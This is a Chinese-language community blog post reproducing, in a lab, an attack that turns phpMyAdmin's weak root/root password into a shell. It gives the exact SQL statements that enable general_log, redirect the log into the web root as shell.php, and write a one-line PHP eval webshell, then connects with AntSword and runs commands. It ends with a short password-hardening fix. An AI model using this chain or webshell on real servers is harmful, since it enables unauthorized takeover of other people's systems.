phpmyadmin弱口令至getshell 漏洞复现

举报
Vista_AX 发表于 2023/06/30 20:53:37 2023/06/30
【摘要】 phpmyadmin弱口令至getshell 漏洞复现

01 环境部署


(1)phpStudy

phpStudy 是一款用于进行 PHP 环境调试的程序集成软件包。在软件安装后便
启动了 MySQL 服务、Apache 服务、PHP 设置等模块,是一款便捷的 PHP 环境调试工具。


本靶场中将使用 YXCMS 作为 Windows 7 边界服务器上开启的 Web 应用。

(2)phpMyAdmin


phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。



02 漏洞配置


暴力破解是专用于密码的破解方法,其破解方式为对密码进行逐个猜测,直至推算到正确密码为止。它通常在网站登录系统上被使用,通过锁定已知的管理员的账户名,对其可能的登录密码进行逐个尝试破解。

在攻击者进行测试的时候,通常的攻击方式是,首先寻找到网站后台登录页面。再使用 BurpSuite 捕获登录行为数据包,将该数据包转发到 Intruder 利用模块,并将其密码参数设置为变量,将有效载荷添加入攻击列表开始攻击,而后观察返回包的字节长度,以此判断是否攻击成功。

该漏洞可能造成的风险是:攻击者利用弱口令登录网站管理员后台,以管理员权限进行恶意破坏。

攻击者会使用弱口令等方式对phpMyAdmin进行登录尝试,登录成功后通过SQL查询获取敏感数据,或者使用phpMyAdmin写入webshell,从而获取服务器权限。

本靶场配置了 phpmyadmin 管理员账号 root/root 默认弱口令

image.png



03 利用方式

攻击者成功利用弱口令root/root登录phpmyadmin 后台后,利用 SQL 语句 show variables like ‘%general%’;查看general log 是否开启

image.png


若发现日志读写功能关闭,于是使用 SQL 语句:SET GLOBAL general_log=‘on’; SHOW VARIABLES LIKE ‘%general%’;打开general_log 日志读写功能。

image.png


打开日志读写功能后,根据图中 general_log_file 中的绝对路径制作一个木马文件:SET GLOBAL general_log_file=‘C:/phpStudy/www/shell.php’

image.png


接着往 shell.php 写入 SELECT ’<?php eval($_POST["jkxy"]);?>

image.png


利用中国蚁剑工具连接一句话 shell.php,连接测试成功,打开虚拟终端,输入命令 whoami,发现命令执行成功。

image.png

image.png

至此攻击者通过phpmyadmin弱口令至getshell,成功获取服务器权限。


04 修复方案


及时修改mysql的root用户口令,确保密码强度符合要求,建议大小写字母+数字+特殊字符+8位以上。

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。